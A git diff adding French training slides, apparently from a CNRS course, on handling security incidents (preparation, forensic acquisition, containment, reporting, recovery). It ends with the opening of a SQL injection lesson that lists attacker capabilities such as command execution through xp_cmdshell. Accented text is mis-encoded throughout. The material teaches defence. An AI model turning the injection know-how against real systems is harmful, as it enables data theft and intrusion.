+    * Analyse fine uniquement Ã  la demande de la chaÃ®ne SSI / DÃ©fense CNRS si suspicion 
+  * Destinataires   
+    * ChaÃ®ne SSI / DÃ©fense CNRS
+    * OPJ dans le cadre dâ€™une enquÃªte prÃ©liminaire ou commission rogatoire
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Pour anticiper le recouvrement s'assurer
+  * Dâ€™avoir un inventaire Ã  jour des mots de passe et des sÃ©questres
+    * Physique
+    * NumÃ©rique
+    * Doit Ãªtre frais et fonctionnel (Ã  tester)
+      * Etes vous en mesure de dÃ©verrouiller un pÃ©riphÃ©rique chiffrÃ© pris au hasard sur votre parc?
+  * D'avoir des sauvegardes fraÃ®ches et fonctionnelles (outil de sauvegarde / dashboard pour le suivi)   
+  * Que vous n'Ãªtes pas le seul Ã  pouvoir rÃ©aliser tester ces opÃ©rations
+    * A minima qu'elles soient documentÃ©es
+    * idÃ©alement former une Ã©quipe d'experts en gestion des incidents
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Kit de survie GdI
+  * liste des contacts
+  * [bloc-note (journal)](/_/gdi/download/Fiche_intervention.pdf)
+  * <i class="fa fa-gift"></i> disque dur externe (recueil de preuve) 
+  * [Livecd A2IMP](https://mycore.core-cloud.net/public.php?service=files&t=1357ba7c8c2604a71f9695449fe6b39a) et doc [linux](https://mycore.core-cloud.net/public.php?service=files&t=f141f3741d356ac95bea7b92287111d7) et [windows](https://mycore.core-cloud.net/public.php?service=files&t=9d00808565b9c8fcd865940008e2b4ac)
+    * [version antÃ©rieure](https://extra.core-cloud.net/collaborations/RSSI-CNRS/Documentation/Documents/ISO%20A2IMP.aspx)
+  * ProcÃ©dures (confinements, configurations, restaurationsâ€¦)
+
+
+## PrÃ©parer <img src="/_/images/PDCA/PDCA-P.png" width="20%" align="right"/>
+* Faire de la veille de vulnÃ©rabilitÃ©s SSI
+  * [https://listes.services.cnrs.fr/wws/admin/corresp_ssi](https://listes.services.cnrs.fr/wws/admin/corresp_ssi)
+    * Pour Ãªtre abonnÃ©  Ã  cette liste de diffusion, il faut faire partie dâ€™au moins une de ces listes sous CORE
+      * CSSI, CSSI Adjoints, ASR, RSSI RÃ©gionaux, RSSI RÃ©gionaux adjoints, RSSI Instituts, CRSSI ou Ãªtre directement inscrit par le RSSI du CNRS.
+    * [l'intranet du CNRS](https://extra.core-cloud.net/collaborations/RSSI-CNRS/Documentation/Documents/Forms/AllItems.aspx?TreeField=Folders)
+      * [Que faire en cas de ranÃ§ongiciel ?](https://extra.core-cloud.net/collaborations/RSSI-CNRS/Documentation/_layouts/WopiFrame.aspx?sourcedoc=/collaborations/RSSI-CNRS/Documentation/Documents/Rancongiciel.docx&action=default&Source=https%3A%2F%2Fextra.core-cloud.net%2Fcollaborations%2FRSSI-CNRS%2FDocumentation%2FDocuments%2FForms%2FAllItems.aspx%3FTreeField%3DFolders&DefaultItemOpen=1&DefaultItemOpen=1)
+      * [Que faire en cas de dÃ©figuration de site web ?](https://extra.core-cloud.net/collaborations/RSSI-CNRS/Documentation/_layouts/WopiFrame.aspx?sourcedoc=/collaborations/RSSI-CNRS/Documentation/Documents/Traitement%20d%C3%A9figuration.docx&action=default&Source=https%3A%2F%2Fextra.core-cloud.net%2Fcollaborations%2FRSSI-CNRS%2FDocumentation%2FDocuments%2FForms%2FAllItems.aspx%3FTreeField%3DFolders&DefaultItemOpen=1&DefaultItemOpen=1)
+  * [https://aresu.dsi.cnrs.fr/spip.php?rubrique73](https://aresu.dsi.cnrs.fr/spip.php?rubrique73)
+  * [http://www.certa.ssi.gouv.fr/](http://www.certa.ssi.gouv.fr/)
+  * [https://services.renater.fr/ssi/cert/info-secu](https://services.renater.fr/ssi/cert/info-secu)
+  * [http://www.cert-ist.com/fra/ressources/Avis/Listedesderniersavis/](http://www.cert-ist.com/fra/ressources/Avis/Listedesderniersavis/)
+  
+<!-- * [http://vigilance.fr](http://vigilance.fr), [https://twitter.com/VUPEN](https://twitter.com/VUPEN), [https://secunia.com/community/advisories/historic/](https://secunia.com/community/advisories/historic/) -->
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/04_detecter_evaluer_et_reagir.md b/content/slides/1337/md/reagir/04_detecter_evaluer_et_reagir.md
new file mode 100644
index 0000000000000000000000000000000000000000..88921e7dbb4e54f5cd396d7f56c80995ce06dadc
--- /dev/null
+++ b/content/slides/1337/md/reagir/04_detecter_evaluer_et_reagir.md
@@ -0,0 +1,44 @@
+## DÃ©tecter, Ã©valuer et rÃ©agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/> 
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/detecter.jpg" width="70%"/>
+</div>
+
+
+## DÃ©tection <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### sources
+* Utilisateurs
+  * Helpdesk
+    * Incidents informatiques
+      * Changements
+      * Performances
+      * RedÃ©marrage de machines
+* Analyses des journaux, outils de surveillance
+  * IDS, IPS, sondes, SIEM, etc.
+* MÃ©trologie
+* ISIRT ([RENATER](https://www.renater.fr/), [CERT-FR](http://cert.ssi.gouv.fr/) [ex CERTA](http://www.cert.ssi.gouv.fr/cert-fr/certfr.html))
+* Police, justice, Victimes dâ€™une attaque
+* MÃ©dias, Sites web ([zataz](http://www.zataz.com/tag/cnrs), [zone-h](http://www.zone-h.org/archive/filter=1/fulltext=1/domain=cnrs), pastebin, etc.)
+
+
+## Identifier & caractÃ©riser <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+* Recueillir les qui, quoi, quand, oÃ¹, comment, etc.
+* En premier lieu, vÃ©rifier que ce n'est pas 
+   * une erreur de configuration
+   * une erreur humaine 
+   * un dÃ©faut de communication entre personnes ou entitÃ©s
+* PremiÃ¨re Ã©valuation, sans parti pris, ni conclusion hÃ¢tive
+* En cas de doute ne pas hÃ©siter Ã  demander de l'aide (local, rÃ©gional, national)
+
+
+## 1<sup>Ã¨re</sup> Ã©valuation  <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+* DÃ©signer une personne compÃ©tente (formÃ©e)
+  * identifiÃ©e en phase de prÃ©paration et lui laisser la main
+* Ouverture du kit de gestion des incidents
+* Horodatage prÃ©cis de l'ouverture du journal
+* DÃ©terminer "Ã  grosse maille" 
+  * ce qui a Ã©tÃ© compromis
+  * l'Ã©tendu des dÃ©gÃ¢ts
+* Typer et classer l'incident
+  * Passer rapidement et directement au confinement
+  * Ou escalader auprÃ¨s de la hiÃ©rarchie et/ou en gestion de crise, puis passer rapidement au confinement
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/05_confiner_et_acquerir.md b/content/slides/1337/md/reagir/05_confiner_et_acquerir.md
new file mode 100644
index 0000000000000000000000000000000000000000..616db42e87d3feecda1babbab5f16517414788a0
--- /dev/null
+++ b/content/slides/1337/md/reagir/05_confiner_et_acquerir.md
@@ -0,0 +1,56 @@
+## Confiner et acquÃ©rir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/inscetoscopes.jpg" width="70%"/>
+</div>
+
+
+## Les outils A2IMP <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+
+* A2IMP : Aide Ã  l'Acquisition d'Informations sur une Machine PiratÃ©e
+* Formation initiale organisÃ©e par l'UREC (2006/2007)
+* MÃ©thodologie toujours valable (mais prise en compte de l'Ã©volution des systÃ¨mes [linux](https://mycore.core-cloud.net/public.php?service=files&t=f141f3741d356ac95bea7b92287111d7) et [windows](https://mycore.core-cloud.net/public.php?service=files&t=9d00808565b9c8fcd865940008e2b4ac))
+* [Livecd A2IMP](https://mycore.core-cloud.net/public.php?service=files&t=1357ba7c8c2604a71f9695449fe6b39a) mis Ã  jour
+  * Scientific Linux 6.5 avec kernel rÃ©cent (3.x)
+  * Outils Ã  la racine du CD (pour l'acquisition des donnÃ©es volatiles)
+    * a2impLinux
+    * a2impWin
+  * Outils en mode LiveCD (dÃ©marrage du systÃ¨me live pour la sauvegarde des partitions)
+
+
+## Confiner et acquÃ©rir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/zalman.jpg" width="70%"/>
+</div>
+
+**Faire l'acquisition des donnÃ©es volatiles avant d'isoler la machine du rÃ©seau** permet de rÃ©cupÃ©rer plus d'informations sur le contexte
+
+* connexions rÃ©seaux, utilisateurs connectÃ©s, processus liÃ©s aux activitÃ© rÃ©seaux, cache, mÃ©moire RAM...
+
+
+## Confiner et acquÃ©rir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+###Â Collecte des donnÃ©es volatiles
+* Monter l'ISO A2IMP 
+* Utiliser les binaires de l'ISO uniquement
+* Lancer le script d'acquisition correspondant au systÃ¨me
+* Sauvegarder les donnÃ©es rÃ©cupÃ©rÃ©es sur un support externe
+
+### cas d'une vm
+* faire un snapshot
+
+
+## Confiner et acquÃ©rir  <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+###Â ArrÃªter la compromission
+* ArrÃªter la machine
+* Deconnecter le cale rÃ©seau physiquement
+
+### cas d'une vm
+* arrÃªter la vm
+* dÃ©sactiver la vm via l'interface de l'hyperviseur
+
+### crÃ©er une image disque
+* rebooter sur l'ISO A2IMP
+  * attention Ã  ne pas rebooter sur le systÃ¨me corrompu
+* lancer la copie du disque avec signature
+  * sur un disque externe
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/06_eradiquer_et_agir.md b/content/slides/1337/md/reagir/06_eradiquer_et_agir.md
new file mode 100644
index 0000000000000000000000000000000000000000..cc09e2b25a5fe11628ff0c5b8229d6616fa06b03
--- /dev/null
+++ b/content/slides/1337/md/reagir/06_eradiquer_et_agir.md
@@ -0,0 +1,117 @@
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+  <img src="/_/gdi/images/Shaun_of_the_Dead.jpg" width="70%"/>
+</div>
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+* [Un problÃ¨me de sÃ©curitÃ© informatique non-traitÃ© est rÃ©prÃ©hensible](#/1/2)
+* DÃ©cider rapidement avec la hiÃ©rarchie et la chaine fonctionnelle des suites Ã  donner
+  * Activer la cellule de gestion de crise
+  * Activer les plans de continuitÃ© et/ou de reprise
+  * Demander une analyse externe
+  * <a href="http://www.dgdr.cnrs.fr/FSD/securite-systemes/que-faire4.htm">porter plainte en matiÃ¨re de SSI</a> sur le site de la DG
+* Conserver les preuves A2IMP faites Ã  lâ€™Ã©tape dâ€™acquisition
+  * Surtout en cas d'analyse judiciaire et/ou CERT
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+* Communiquer en interne de lâ€™unitÃ©
+  * En accord avec la hiÃ©rarchie !
+  * Peut Ãªtre Ã©tabli au prÃ©alable lors de la phase de prÃ©paration
+* Communiquer en externe de lâ€™unitÃ©
+  * En accord avec la hiÃ©rarchie !
+  * signaler l'incident au niveau rÃ©gional et national (chaÃ®ne SSI)
+    * pour les unitÃ©s multi-Ã©tablissements
+      * la Â« convention de site Â» doit prÃ©ciser qui est pilote SSI
+
+## DÃ©clarer l'incident <!-- .element: class="fragment" -->
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### DÃ©clarer l'incident ... Ã  qui?
+* Fonctionnaire de sÃ©curitÃ© de dÃ©fense (FSD)
+  * Est informÃ© des incidents concernant la protection du potentiel scientifique et technique (PPST)
+  * A dÃ©lÃ©gation pour porter plainte en cas dâ€™intrusion
+* Direction des affaires juridiques (DAJ)
+  * ImpliquÃ©e dans les dÃ©pÃ´ts de plainte
+  * Intrusion <i class="fa fa-hand-o-right"></i> FSD
+  * Autres (vol par exemple) <i class="fa fa-hand-o-right"></i> DAJ
+* Correspondant informatique et libertÃ©s (CIL)
+  * ImpliquÃ© lorsquâ€™il y a violation de donnÃ©es Ã  caractÃ¨re personnel
+* Direction de la communication (DirCom)
+  * ImpliquÃ©e lorsquâ€™un incident a une exposition mÃ©diatique
+* Direction de lâ€™audit interne (DAI)
+  * VÃ©rification que les procÃ©dures sont bien conformes
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### DÃ©clarer l'incident ... Ã  qui?
+* DÃ©lÃ©guÃ© rÃ©gional
+  * DÃ©lÃ©gation pour certains dÃ©pÃ´ts de plainte (aprÃ¨s avis de la DAJ)
+  * ImpliquÃ© dans la gestion de crise
+* Directeur dâ€™unitÃ©
+  * SystÃ©matiquement informÃ© dâ€™un incident dans son unitÃ©
+  * La sÃ©curitÃ© est de sa responsabilitÃ©
+* Utilisateur
+  * A lâ€™obligation de remonter les incidents SSI
+* Cellule de crise
+* RSSI des autres tutelles
+  * Doivent systÃ©matiquement Ãªtre informÃ©s dâ€™un incident
+  * A charge de rÃ©ciprocitÃ©
+* Tenir informer le CERT (ISIRT) qui a signalÃ© lâ€™incident
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### DÃ©clarer l'incident ... par qui?
+* Le CSSI (ou le RSSI-RÃ©gion) enregistre lâ€™incident.
+* Le CSSI, le RSSI-RÃ©gion et le RSSI partenaire complÃ¨tent lâ€™enregistrement.
+* Le RSSI CNRS
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### DÃ©clarer l'incident ... comment?
+* Formulaire de dÃ©claration d'incident sur l'espace de travail collaboratif dÃ©diÃ© Ã  la SSI
+  * [https://extra.core-cloud.net/collaborations/RSSI-CNRS/SitePages/D%c3%a9clarer%20un%20incident.aspx](https://extra.core-cloud.net/collaborations/RSSI-CNRS/SitePages/D%c3%a9clarer%20un%20incident.aspx)
+    * DÃ©tails
+    * Machines compromises
+    * Journal
+    * Investigations
+    * Impacts et consÃ©quences de l'incident
+  * [Aide Ã  la gestion des incidents](https://extra.core-cloud.net/collaborations/RSSI-CNRS/SitePages/Aide%20gestion%20des%20incidents.aspx)
+
+Note:
+- ouvrir le formulaire
+- dÃ©rouler tous les pop up 
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### Investiguer
+* Trouver les causes de l'incident afin de revenir Ã  une situation normale
+  * En gÃ©nÃ©ral, un incident a plusieurs causes
+    * Une ou plusieurs [menaces](#menace)
+      * Une ou plusieurs [vulnÃ©rabilitÃ©s](#vulnerabilite)
+        * Techniques
+        * Organisationnelles
+* Si nÃ©cessaire, activer une analyse inforensique poussÃ©e (type A3IMP)
+  * CoÃ»ts
+  * DÃ©gÃ¢ts causÃ©s
+  * Facteurs juridiques et procÃ©dure judiciaire
+  * ComplexitÃ©s de lâ€™attaque
+
+
+## Eradiquer et agir <img src="/_/images/PDCA/PDCA-D.png" width="20%" align="right"/>
+### PrÃ©parer le retour Ã  la normale
+* Revenir Ã  une situation nominale
+  * Restauration partielle
+  * Eradication des codes malveillants, etc.
+  * Ou, rÃ©installation complÃ¨te
+    * RecommandÃ©, surtout en cas de doute !
+    * Importance des sauvegardes et archives !                 
+* Et dans tous les cas sâ€™assurer que lâ€™incident ne se reproduise pas
+  * Durcir les configurations
+  * Changer et durcir les mots de passe et Ã©ventuellement les mÃ©thodes d'authentification (multifacteur)
+  * Mettre Ã  jour les correctifs de sÃ©curitÃ©
+  * Durcir la topologie rÃ©seau (VLAN, routage, etc.)
+  * Durcir le filtrage rÃ©seau
+  * **Avant de rÃ©-ouvrir le service**
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/07_recouvrer.md b/content/slides/1337/md/reagir/07_recouvrer.md
new file mode 100644
index 0000000000000000000000000000000000000000..be4774b8db48106ac4614e07b5a1b8d8cfe9d50d
--- /dev/null
+++ b/content/slides/1337/md/reagir/07_recouvrer.md
@@ -0,0 +1,21 @@
+## Recouvrer <img src="/_/images/PDCA/PDCA-C.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/walkertexasranger.jpg" width="70%"/>
+</div>
+
+
+## Recouvrer <img src="/_/images/PDCA/PDCA-C.png" width="20%" align="right"/>
+
+* Objectif: s'assurer d'avoir remis en service un systÃ¨me sain
+  * Actions
+    * VÃ©rifier et valider le comportement du systÃ¨me 
+      * Recettes fonctionnelle et technique avant rÃ©-ouverture
+      * RÃ©-ouvrir le service en mode nominal ou dÃ©gradÃ©
+      * Suivi renforcÃ© du comportement dans les minutes / les heures / les jours (en fonction du contexte) qui suivent la rÃ©ouverture du service
+        * Analyse quotidienne des traces rÃ©seaux et systÃ¨mes
+        * Analyse quotidienne des journaux dâ€™audit
+        * Visite quotidienne des urls
+        * Revue quotidienne des rÃ©sultats Google
+        * Etc.
+* Si nÃ©cessaire, mettre en place une supervision Ã  plus long terme
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/08_consolider.md b/content/slides/1337/md/reagir/08_consolider.md
new file mode 100644
index 0000000000000000000000000000000000000000..a11e8c62c2a4eb7943d5d586519f2ee38f2ef0eb
--- /dev/null
+++ b/content/slides/1337/md/reagir/08_consolider.md
@@ -0,0 +1,75 @@
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+    <img src="/_/gdi/images/colmater.jpeg" width="70%"/>
+</div>
+
+
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+### Objectifs</h3>
+* Augmenter le niveau de sÃ©curitÃ©
+* Capitaliser lâ€™expÃ©rience acquise
+* Accompagner et responsabiliser lâ€™ensemble des acteurs (hiÃ©rarchie, prestataires, utilisateurs, etc.)
+
+
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+### PrÃ©parer un bilan de lâ€™incident</h3>
+* Si besoin, effectuer des investigations complÃ©mentaires
+  * se faire aider si besoin
+    * Prestataire de confiance
+    * Informaticien CNRS ou partenaire
+    * RÃ©seau SSI
+    * Etc.
+* Ecrire un rapport factuel et dÃ©taillÃ© incluant le journal de lâ€™incident
+
+
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+* PrÃ©parer un plan d'amÃ©lioration
+  * Proposer des actions concrÃ¨tes d'amÃ©lioration Ã©valuÃ©es selon plusieurs critÃ¨res (charge, coÃ»t, complexitÃ©, dÃ©lai, ...) afin de permettre la prise de dÃ©cision
+  * Si nÃ©cessaire, proposer Ã©galement des amÃ©liorations du processus de gestion des incidents de l'entitÃ©
+* ComplÃ©ter par une estimation du coÃ»t et des consÃ©quences de la Â« non-sÃ©curitÃ© Â»
+  * Valoriser les impacts financiers liÃ©s Ã  la perte ou la compromission des informations
+  * Valoriser les coÃ»ts des actifs supports volÃ©s ou perdus
+  * H.J. dÃ©diÃ©s Ã  la gestion de lâ€™incident
+  * H.J. perdus dÃ» Ã  lâ€™incident
+  * Perte de confiance ou dâ€™image de marque
+
+
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+  <a href="https://extra.core-cloud.net/collaborations/RSSI-CNRS/tableau_de_bord/Incidents/R%C3%A9partition%20des%20incidents%20par%20cat%C3%A9gorie.aspx">
+    <img src="/_/gdi/images/stat_cnrs_1.png"/>
+  </a>
+</div>
+
+
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+
+<div style="text-align: center;">
+  <a href="https://extra.core-cloud.net/collaborations/RSSI-CNRS/tableau_de_bord/Incidents/Statistiques%20mensuelles%20des%20incidents.aspx">
+    <img src="/_/gdi/images/stat_cnrs_2.png"/>
+  </a>
+</div>
+
+
+## Consolider <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+## ClÃ´turer lâ€™incident
+* Dans un dÃ©lai raisonnable: rÃ©aliser un retour dâ€™expÃ©rience (fortement recommandÃ©)
+  * Expliquer de faÃ§on factuelle en sÃ©ance ce quâ€™il sâ€™est passÃ© sur la base du rapport
+  * Inviter les diffÃ©rentes parties prenantes, dont la hiÃ©rarchie
+  * Envoyer le rapport et la proposition de plan dâ€™actions Ã  lâ€™avance
+* Impliquer la hiÃ©rarchie
+  * Si possible et si nÃ©cessaire, lors de la mÃªme sÃ©ance, faire Ã©voluer et dans tous les cas, faire valider le plan d'actions par les parties prenantes et la hiÃ©rarchie
+* A la fin de cette sÃ©ance, mÃªme sâ€™il reste des actions, lâ€™incident peut Ãªtre considÃ©rÃ© clÃ´turÃ©.
+
+
+## ClÃ´turer lâ€™incident <img src="/_/images/PDCA/PDCA-A.png" width="20%" align="right"/>
+###Â Actions post-incidents</h3>
+* Consolider (CrÃ©er) la base d'incidents
+* Consolider (Commencer) lâ€˜analyse de risque
+* Suivre le plan d'actions
+  * IntÃ©grer le suivi de rÃ©alisation de ces actions dans un comitÃ© existant (recommandÃ©) ou crÃ©er un comitÃ© ad-hoc
+  * Rendre compte Ã  la hiÃ©rarchie de lâ€™avancÃ©e des actions
+* Partager la mÃ©saventure et lâ€™expÃ©rience avec les rÃ©seaux dâ€™informaticiens
+* Sâ€™il y a eu dÃ©pÃ´t de plainte, rÃ©pondre aux services de police et suivre lâ€™avancÃ©e des procÃ©dures judiciaires
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/09_erreurs_a_eviter.md b/content/slides/1337/md/reagir/09_erreurs_a_eviter.md
new file mode 100644
index 0000000000000000000000000000000000000000..7724f9c86ef27ab692fdedbfc6760265e131fb9a
--- /dev/null
+++ b/content/slides/1337/md/reagir/09_erreurs_a_eviter.md
@@ -0,0 +1,75 @@
+## Erreurs Ã  Ã©viter
+<div style="text-align: center;">
+    <img src= "/_/gdi/images/erreurs_a_eviter.png" width="90%"/>
+</div>
+
+
+## Erreurs Ã  Ã©viter
+* Ne pas dÃ©clarer, dissimuler les incidents
+  * Outil pour la saisie des incidents
+    * Pourquoi investir dans la sÃ©curitÃ© sâ€™il nâ€™y a jamais dâ€™incident
+    * Traiter mais oublier de dÃ©clarer l'incident
+  * Minimiser la gravitÃ© de l'incident
+  * Sur-rÃ©agir Ã  l'incident
+  * Ne pas demander aide et conseils
+    * Aucune honte
+    * NÃ©cessaire recul
+    * RÃ©seau dâ€™experts
+  * Ne pas distinguer les incidents liÃ©s Ã  la sÃ©curitÃ© de lâ€™information de ceux qui ne le sont pas
+    * Surcharge des Ã©quipes en charge de la SSI: un bourrage dâ€™imprimante nâ€™est pas un incident SSI mÃªme, si câ€™est trÃ¨s important pour lâ€™utilisateur
+
+
+## Erreurs Ã  Ã©viter
+* Vouloir aller trop vite
+  * Ne pas prendre les mesures conservatoires et ne pas recueillir les Ã©lÃ©ments qui serviront Ã  lâ€™analyse et aux preuves
+  * RÃ©tablir un service avant dâ€™Ãªtre sÃ»r dâ€™avoir compris ce quâ€™il sâ€™est passÃ© et dâ€™avoir comblÃ© les failles
+  * CÃ©der Ã  la pression des utilisateurs
+* Avoir des descriptions incomplÃ¨tes ou imprÃ©cises des incidents
+* Ne pas se rendre compte que l'on dispose d'informations fausses ou incomplÃ¨tes
+* DÃ©truire des preuves
+  * Lancer des outils de dÃ©tection directement sur la machine et non pas sur une copie des informations
+  * RÃ©installer avant dâ€™avoir recueilli et sauvegardÃ© toutes les informations
+
+
+## Erreurs Ã  Ã©viter
+* Mal communiquer
+  * Oublier de prÃ©venir la hiÃ©rarchie
+  * Trop communiquer
+  * Ne pas informer les gens ayant besoin d'en connaitre
+* Ne pouvoir contenir et Ã©radiquer lâ€™incident
+* Se refaire compromettre par la mÃªme faiblesse
+* Ne pouvoir rÃ©tablir un environnement sain
+* Ne pas faire de retour dâ€™expÃ©rience
+* Si la faille dÃ©passe l'unitÃ©, poursuivre l'analyse sur un dispositif distant sans l'autorisation du propriÃ©taire
+* Engager une contre-attaque
+  * IllÃ©gal
+  * Imputation trÃ¨s difficile, risque de se tromper de cible
+  * Lâ€™attaquant est trÃ¨s fort et peut rÃ©agir violemment
+
+
+## Recommandations
+* Faire de la veille technologique et recevoir les bulletins d'alertes
+* ÃŠtre prÃ©parÃ©
+  * Essentiel pour pouvoir rÃ©agir correctement en situation de stress, de crise
+  * Disposer des outils
+    * Les tester rÃ©guliÃ¨rement
+    * Les maintenir Ã  jour
+  * ConnaÃ®tre / Documenter les procÃ©dures
+  * Sâ€™entraÃ®ner, faire des simulations dâ€™incident
+  * Tester rÃ©guliÃ¨rement les sauvegardes et les restaurations
+  * Avoir des outils automatiques dâ€™installation de machines (facilite la rÃ©installation)
+
+
+## Recommandations
+* Ne pas attendre dâ€™avoir toutes les informations pour dÃ©clarer un incident
+  * Indiquer si on nâ€™est pas sÃ»r dâ€™une information
+  * ComplÃ©ter, corriger par la suite
+* Traiter la dÃ©couverte dâ€™une vulnÃ©rabilitÃ© comme un incident
+  * Quasi incident
+  * Retour dâ€™expÃ©rience, amÃ©lioration
+* Impliquer la hiÃ©rarchie
+* Communiquer
+  * DÃ©licat mais essentiel
+  * Adapter le discours aux diffÃ©rentes parties prenantes
+  * Le meilleur communicant nâ€™est pas celui qui a les mains dans le cambouis, faire passer les messages par la direction 
+* Maitriser son pÃ©rimÃ¨tre informatique
\ No newline at end of file
diff --git a/content/slides/1337/md/reagir/10_conclusions.md b/content/slides/1337/md/reagir/10_conclusions.md
new file mode 100644
index 0000000000000000000000000000000000000000..91d0b6195dd806acffcd46320572a15018acadde
--- /dev/null
+++ b/content/slides/1337/md/reagir/10_conclusions.md
@@ -0,0 +1,30 @@
+        
+## Conclusions
+
+<div style="text-align: center;">
+    <img src= "/_/gdi/images/Monsieur-Cyclopede.jpg" width="90%"/>
+</div>
+
+
+## Conclusions
+* Bien dÃ©terminer le type d'incident
+  * pour appliquer la bonne procÃ©dure
+* Bien caractÃ©riser l'incident
+  * Pour amÃ©liorer lâ€™apprÃ©ciation des risques
+  * Pour une remontÃ©e efficace
+  * Pour Estimer le coÃ»t de la non sÃ©curitÃ©
+* Traiter aussi les Ã©vÃ¨nements et les vulnÃ©rabilitÃ©s
+
+
+## Ressources complÃ©mentaires
+* [DSI pÃ´le ARESU - SÃ©curitÃ©](https://aresu.dsi.cnrs.fr/spip.php?rubrique16)
+* [Tous les documents de l'ANF Gestion des incidents](https://extra.core-cloud.net/collaborations/RSSI-CNRS/Formation%20%20Gestion%20des%20Incidents/Forms/AllItems.aspx)
+  * [les documents de la DR17 qui ont servis pour la mise Ã  jour de cette prÃ©sentation (MERCI!)](https://extra.core-cloud.net/collaborations/RSSI-CNRS/Formation%20%20Gestion%20des%20Incidents/Forms/AllItems.aspx?RootFolder=%2Fcollaborations%2FRSSI-CNRS%2FFormation%20%20Gestion%20des%20Incidents%2FFormation%20-%20Gestion%20des%20Incidents%202014%2FDR17&FolderCTID=0x012000859DA60215B6CA43B5033CAD99231941&View={45010E28-1540-4E48-B20B-06496674B54F})
+* [ENISA - Good Practice Guide for Incident Management](https://www.enisa.europa.eu/activities/cert/support/incident-management)
+* [ISO27035 (Information security incident management)](http://www.iso27001security.com/html/27035.html)
+* [PSSIE](http://www.ssi.gouv.fr/IMG/pdf/pssie_anssi.pdf)
+* [Objectifs de sÃ©curitÃ© [ANSSI]](http://www.ssi.gouv.fr/IMG/pdf/20140310_Objectifs_de_cybersecurite_document_public.pdf)
+* [Charte informatique du CNRS](http://www.cil.cnrs.fr/CIL/IMG/pdf/charte_info.pdf)
+
+        
+            
\ No newline at end of file
diff --git a/content/slides/1337/md/sqli.md b/content/slides/1337/md/sqli.md
new file mode 100644
index 0000000000000000000000000000000000000000..47c63007582685baaaa45ae89e239d4da463ed79
--- /dev/null
+++ b/content/slides/1337/md/sqli.md
@@ -0,0 +1,398 @@
+# Injection SQL
+
+![SQLi](images/sqli/sqlinjection_comics.png "SQLi")
+
+## aka SQLi
+
+
+### <i class="fa fa-cogs"></i> Principe
+* Une application envoie des donnÃ©es
+  * non *assinies* Ã  un interprÃ©teur
+* L'attaquant envoie des sÃ©quences de texte permettant d'exploiter l'interprÃ©teur visÃ©
+  * toutes sources de donnÃ©es peut Ãªtre utilisÃ©es
+      * paramÃ¨tres HTTP, PATH_INFO, cookies, en-tÃªtes HTTP, fichiers uploadÃ©s
+      * au niveau de la reque et [et de la rÃ©ponse <i class="fa fa-reddit"></i>](http://i.imgur.com/8khrzf9.png)
+
+
+### <i class="fa fa-user-secret"></i> Que peut on faire?
+* Lire des donnÃ©es "protÃ©gÃ©es"
+* Corrompre des donnÃ©es
+* DÃ©nis de services
+* Lecture / Ã©criture sur le systÃ¨me de fichiers
+* ExÃ©cution de commandes arbitraires
+
+Note:
+- marche pour tout interprÃ©teur LDAP, XML, bash (shellshock)
+- dÃ©tectable aux messages d'erreur en cas d'input invalide
+  - SQL universel ce qui rend la faille trÃ¨s populaire
+    - au moment de l'exploitation il faut connaÃ®tre le SGBD poru aller plus loin
+      - Ã©criture dans des fichiers
+      - passer des commandes via xp_commandshell pour un server MSSQL
+- potentielle compromission totale
+  - exÃ©cution de code
+  - backdoor
+  - local root exploit
+
+
+## [DiffÃ©rents types](https://www.linkedin.com/grp/post/36874-130061102)
+
+#### [<i class="fa fa-eye"></i> Error-based]((https://www.owasp.org/index.php/SQL_Injection))
+* Les messages d'erreur mysql sont accessibles
+
+#### [<i class="fa fa-check-square"></i> Boolean (Blind)](https://www.owasp.org/index.php/Blind_SQL_Injection)
+
+* Pas de message d'erreur
+* Un comportement diffÃ©rent selon que la requÃªte est valide ou non
+  * nÃ©cessite en gÃ©nÃ©ral d'itÃ©rer
